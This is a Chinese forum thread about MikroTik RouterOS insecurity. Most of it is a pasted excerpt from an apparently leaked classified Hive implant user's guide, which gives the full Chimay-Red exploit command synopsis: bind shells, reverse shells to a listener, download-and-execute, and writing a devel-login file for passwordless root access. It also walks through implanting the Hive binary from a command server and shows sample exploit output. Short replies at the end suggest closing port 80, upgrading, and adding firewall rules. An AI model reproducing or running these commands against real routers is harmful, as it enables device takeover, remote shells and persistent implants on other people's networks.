ros并不安全,Installing Hive on MikroTik MIPS RouterOS 6.x
Installing Hive on MikroTik MIPS RouterOS 6.x using
Chimay-Red
(S) MikroTik routers running version 6.x of RouterOS may be exploited using Chimay-Red. Examples
here use Chimay-Red version 4.7.1.
7.1.1 (S) Chimay Red Command Synopsis
chimay_red.py [-h] -t TARGET [-V] [-a ARCH] <command>
Options:
-h, --help show this help message and exit
-t TARGET, --target
TARGET
Target machine address as <IP:PORT>
-V, --verbose Verbose mode, print out debug and error
messages
-a ARCH, --arch ARCH Specify architecture (mipsbe, ppc, x86, tile)
Available commands are as follows:
Command Function
bindshell create a bindshell
connectback create a reverse shell
download_and_exe connect back and download a file to then execute
ssl_download_and_exe connect back and download a file via SSL to then
execute
write_devel write "devel-login" file to allow developer account login
write_devel_read_userfi
le
in additon to enabling developer logins, read back the
users file
custom custom shellcode
EXAMPLES
python chimay_red.py -V -t 192.168.88.1:80 bindshell -p 4242
python chimay_red.py -a ppc -t 192.168.88.1:80 connectback -l 192.168.88.2 -p 4242
SECRET//NOFORN//20401109 23
SECRET//NOFORN
(U) Appendix A: Operational Notes (U) Hive 2.9.1 User's Guide
python chimay_red.py -t 192.168.88.1:80 download_and_exe -l 192.168.88.2 -p 4242 -f /tmp/file.elf
python chimay_red.py -t 192.168.88.1:80 ssl_download_and_exe -l 192.168.88.2 -p 4242 -f
/tmp/file.elf
7.1.2 (S) Obtaining Shell Access
(S) To obtain shell access to the router, direct Chimay-Red to an open port on the target address
(typically port 80, which is used for the admin GUI) using the write_devel command having the
following syntax:
python chimay_red.py t
<router address>:<open port> write_devel
(S) Example:
python chimay_red.py t
192.168.88.1:80 write_devel
(S) Use telnet to access the device using the target address. At the login prompt enter devel,
followed by an empty line for the password (i.e. no password). You should receive a BusyBox banner
followed by the root prompt (#).
7.1.3 (S) Implanting Hive
(S) To implant Hive into the router, use download_and_exe_server.py found in the Chimay-Red tools
directory as a download server using the following syntax.
python download_and_exe_server.py l
<command/control address> \
p
<listen port> f
<path to Hive binary>
(S) The command/control address is the host from which the target will obtain the Hive binary after
connecting to the associated listening port.
(S) Example:
python download_and_exe_server.py l
10.6.5.200 p
2000 \
f
~/hive/server/hivedmikrotikmipsPATCHED
(S) Once the server is listening, execute Chimay-Red using the following syntax.
python chimay_red.py t
<target address>:<port> download_and_exe \
l
<listen address> p
<listen port> f
<filename path on the target>
(S) If all goes well, Chimay-Red will provide an indication of what it's doing and then ask you to
press ENTER to start the download of Hive. See the example below.
24 SECRET//NOFORN//20401109
$ python ./chimay_red.py t
10.6.5.71:80 download_and_exe \
l
10.6.5.200 p
10000 f
/tmp/hivedmikrotikmipsPATCHED
[+] Connecting to: 10.6.5.71:80
[+] Detected RouterOS: 6.13
[+] Detected architecture: mipsbe
Start download_and_exe server on 10.6.5.200:2000, then press ENTER...
[+] 0 seconds until Web server is reset.
[+] Web server reset.
[+] Connecting to target...
[+] Connected.
[+] Sending exploit payload...
[+] Exploit sent.
$
SECRET//NOFORN
(U) Hive 2.9.1 User's Guide (U) Appendix A: Operational Notes
(S) For additional information, please refer to the documentation provided with Chimay-Red.
SECRET//
ros 192.168.88.1:80;P
好了,大家关闭80端口服务,收工 尽快升级新版本 本帖最后由 xuxi3201 于 2017-12-23 13:45 编辑
ros自带防火墙 , 只要你水平高,可以写出任何语句,
初级水平:限制指定ip登录ros的管理端口;
中级水平:限制暴力破解密码;
更高水平:丢弃攻击的数据包; http://www.freebuf.com/news/132067.html原文出处 这个官方不处理估计关80端口和防火墙没有用。 02/02/2015 Release 2.8 TDR
03/03/2015 Release 2.8.1 TDR
07/15/2015 Release 2.9 TDR
11/09/2015 Release 2.9.1 TDR
两年前就已经开始的事情
页:
[1]